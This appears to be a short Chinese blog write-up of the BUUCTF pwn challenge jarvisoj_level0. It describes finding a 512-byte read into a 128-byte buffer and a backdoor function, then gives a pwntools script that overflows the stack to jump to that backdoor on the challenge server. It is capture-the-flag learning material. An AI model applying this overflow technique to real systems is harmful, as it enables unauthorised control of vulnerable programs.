BUUCTF刷题之路-jarvisoj_level01

直接IDA打开看主函数如下:

BUUCTF刷题之路-jarvisoj_level01_第1张图片

 跟进这个vulnerable_function函数:

BUUCTF刷题之路-jarvisoj_level01_第2张图片

 看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。:

BUUCTF刷题之路-jarvisoj_level01_第3张图片

接下来我们验证开启了哪些保护:

BUUCTF刷题之路-jarvisoj_level01_第4张图片

还是熟悉的味道,直接构造exp:

from pwn import *
sh=remote('node4.buuoj.cn',25804)
buf2_addr =0x400596
sh.sendline(b'A'*136 + p64(buf2_addr))
sh.interactive()

 得到flag:

 BUUCTF刷题之路-jarvisoj_level01_第5张图片

你可能感兴趣的:(pwn,CTF,python,c++)